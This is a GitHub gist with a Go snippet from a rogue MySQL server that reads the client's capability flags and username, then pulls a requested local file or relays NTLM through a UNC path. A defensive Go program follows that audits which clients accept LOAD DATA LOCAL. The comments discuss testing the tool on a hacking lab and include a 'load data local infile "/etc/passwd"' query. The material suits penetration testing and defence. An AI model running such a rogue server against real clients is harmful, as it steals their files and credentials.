Last active May 4, 2020 19:37
Gist: bmaia/adc503231ffff19a77aaf0c7abd2e895
```go
for mysql.Running() {
	// tcp listener
	conn, err := mysql.listener.AcceptTCP()
	if err != nil {
		log.Warning("Error while accepting TCP connection: %s", err)
		// (...)
	}

	// send the mysql greeting
	// (...)

	// read the incoming responses and retrieve infile
	// TODO: include binary support and files > 16kb
	b := make([]byte, 16384)
	// (...)

	// parse client capabilities and validate connection
	// TODO: parse mysql connections properly and
	// display additional connection attributes
	// b[4], b[5] are the low 16 bits of the HandshakeResponse41 capability flags;
	// "%08b" yields 16 characters only when bit 15 (CLIENT_SECURE_CONNECTION) is set
	clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8)))
	if len(clientCapabilities) == 16 {
		remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]
		log.Info("MySQL connection from: %s", remoteAddress)
		// character 8 of the 16-character string is bit 7 (0x80), CLIENT_LOCAL_FILES
		loadData := string(clientCapabilities[8])
		log.Info("Can Use LOAD DATA LOCAL: %s", loadData)
		// username starts after the 4-byte header and the 32-byte fixed part
		username := bytes.Split(b[36:], []byte{0})[0]
		log.Info("MySQL Login Request Username: %s", username)

		// send initial responseOK
		// (...)

		infileLen, err := bufio.NewReader(conn).Read(b)
		if err != nil {
			log.Warning("Error while reading buffer: %s", err)
			// (...)
		}

		// check if the infile is an UNC path
		if strings.HasPrefix(mysql.infile, "\\") {
			log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
		} else {
			// print the infile content, ignore mysql protocol headers
			// TODO: include binary support and output to a file
			log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4])
		}

		// send additional response
		// (...)
	}
	// note: a defer inside the loop only runs when the enclosing function returns
	defer conn.Close()
}
```
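The snippet above pulls a single bit out of the client's capability flags (character 8 of the `%08b` string, i.e. bit 7, `CLIENT_LOCAL_FILES`) and reads the username from offset 36. The same parse is what a defender needs when auditing which clients would hand a local file to whatever server they connect to: a client started with `local-infile` disabled does not set that bit, which is the mitigation this whole technique depends on. The following Go program is an added example, not code from the gist or from bettercap; it decodes a HandshakeResponse41 packet with length checks and all four capability bytes, and the constant names, struct fields, the `BuildSampleResponse` helper and the sample packets it builds are all mine (constructed data, not captured traffic).

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
)

// Capability bits from Protocol::CapabilityFlags in the MySQL client/server protocol.
const (
	clientLocalFiles uint32 = 0x00000080 // CLIENT_LOCAL_FILES: client will serve LOAD DATA LOCAL INFILE
	clientProtocol41 uint32 = 0x00000200 // CLIENT_PROTOCOL_41
	clientSecureConn uint32 = 0x00008000 // CLIENT_SECURE_CONNECTION
	clientAuthLenEnc uint32 = 0x00200000 // CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA
)

// HandshakeResponse is the subset of a HandshakeResponse41 packet that a login audit cares about.
type HandshakeResponse struct {
	Capabilities uint32
	Username     string
	LocalFiles   bool // true when the client advertises CLIENT_LOCAL_FILES
}

// ParseHandshakeResponse decodes a raw HandshakeResponse41 packet (4-byte packet header
// followed by the payload), validating lengths before touching any offset.
func ParseHandshakeResponse(pkt []byte) (HandshakeResponse, error) {
	var hr HandshakeResponse
	if len(pkt) < 4 {
		return hr, errors.New("packet shorter than the 4-byte header")
	}
	payloadLen := int(pkt[0]) | int(pkt[1])<<8 | int(pkt[2])<<16
	if len(pkt) < 4+payloadLen {
		return hr, fmt.Errorf("truncated packet: header announces %d bytes, got %d", payloadLen, len(pkt)-4)
	}
	p := pkt[4 : 4+payloadLen]
	// Fixed part: 4 bytes capabilities, 4 max packet size, 1 charset, 23 reserved = 32 bytes,
	// which is why the gist takes the username from offset 4+32 = 36 of the raw buffer.
	if len(p) < 32 {
		return hr, errors.New("payload too short for HandshakeResponse41")
	}
	hr.Capabilities = binary.LittleEndian.Uint32(p[0:4])
	if hr.Capabilities&clientProtocol41 == 0 {
		return hr, errors.New("client did not set CLIENT_PROTOCOL_41")
	}
	if hr.Capabilities&clientSecureConn == 0 {
		return hr, errors.New("legacy NUL-terminated auth-response not handled in this example")
	}
	// Bit 7 (0x80) is CLIENT_LOCAL_FILES, the bit the gist reads as clientCapabilities[8].
	hr.LocalFiles = hr.Capabilities&clientLocalFiles != 0

	rest := p[32:]
	i := bytes.IndexByte(rest, 0)
	if i < 0 {
		return hr, errors.New("username is not NUL-terminated")
	}
	hr.Username = string(rest[:i])
	rest = rest[i+1:]

	// auth-response: 1 length byte + data (a length-encoded int when CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA
	// is set; only the single-byte form is handled here).
	if len(rest) < 1 {
		return hr, errors.New("missing auth-response length")
	}
	authLen := int(rest[0])
	if hr.Capabilities&clientAuthLenEnc != 0 && authLen >= 0xfb {
		return hr, errors.New("multi-byte auth-response length not handled in this example")
	}
	if len(rest) < 1+authLen {
		return hr, errors.New("truncated auth-response")
	}
	return hr, nil
}

// BuildSampleResponse assembles a HandshakeResponse41 packet from the given capabilities and
// username. Constructed sample data for the demo, not a packet captured from a real client.
func BuildSampleResponse(caps uint32, user string) []byte {
	var payload bytes.Buffer
	binary.Write(&payload, binary.LittleEndian, caps)
	binary.Write(&payload, binary.LittleEndian, uint32(16777216)) // max packet size
	payload.WriteByte(0x21)                                       // utf8_general_ci
	payload.Write(make([]byte, 23))                               // reserved, all zero
	payload.WriteString(user)
	payload.WriteByte(0)
	payload.WriteByte(0) // empty auth-response
	n := payload.Len()
	pkt := []byte{byte(n), byte(n >> 8), byte(n >> 16), 1} // 3-byte length + sequence id 1
	return append(pkt, payload.Bytes()...)
}

// AuditLine renders the one line a login monitor would emit for a parsed response.
func AuditLine(remote string, hr HandshakeResponse) string {
	risk := "client refuses LOAD DATA LOCAL"
	if hr.LocalFiles {
		risk = "client accepts LOAD DATA LOCAL (would upload a local file to a rogue server)"
	}
	return fmt.Sprintf("login from %s as %q caps=0x%08x: %s", remote, hr.Username, hr.Capabilities, risk)
}

func main() {
	base := clientProtocol41 | clientSecureConn
	// Constructed packets: a client with local-infile enabled, and one started with --local-infile=0.
	for _, pkt := range [][]byte{BuildSampleResponse(base|clientLocalFiles, "app"), BuildSampleResponse(base, "app")} {
		if hr, err := ParseHandshakeResponse(pkt); err != nil {
			fmt.Println("parse error:", err)
		} else {
			fmt.Println(AuditLine("10.0.0.5", hr)) // 10.0.0.5 is a made-up address
		}
	}
}
```

Run it as `go run main.go`; the two audit lines differ only in the capability word and the risk text, which is exactly the difference between a client that will answer a server's file request and one that will not.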

guanicoe commented May 4, 2020

Are the (...) on line 55 (end) on purpose?


bmaia commented May 4, 2020

> Are the (...) on line 55 (end) on purpose?

Yes, this is just a code snippet for the blogpost here ->

The full source code for the server was merged into Bettercap, you can find it here:


guanicoe commented May 4, 2020

@bmaia I did not expect such a swift response. I did check the code in bettercap and saw it was indeed included. I'm about to test your tool on HTB, thanks ;)


guanicoe commented May 4, 2020

Hey again, I'm having an issue with this tool related to bettercap/bettercap#572. Basically I get the `[sys.log] [war] mysql.server unpexpected buffer size 4` error (I actually also corrected the typo in the main code).
I don't really know what it means nor how to troubleshoot.

```
$mariadb -V
mariadb  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
$mysql -V
mysql  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
```

Do you think you could help?


bmaia commented May 4, 2020

You can try to use other Rogue MySQL clients like the one below:

The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD DATA, check the mysql packets and try to replay them (see the snippets below for an example):

```sql
-- LOCAL makes the client (not the server) read the file and send it over the connection,
-- which is the exchange the rogue server snippet above expects to see
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```

The post below is a good (and more recent) reference:


guanicoe commented May 4, 2020

OK, I'll give it a try. I did first try it but it spat a lot of exceptions, and reading your post I thought I'd give bettercap a try as everything was integrated.

```
error: uncaptured python exception, closing channel <__main__.http_request_handler connected at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/|read|83] [/usr/lib/python2.7/|handle_read_event|449] [/usr/lib/python2.7/|handle_read|147] [|found_terminator|184])
```


guanicoe commented May 4, 2020

Just to let you know that your module works great, and that I was to blame. The error came from a malformed SQL query.
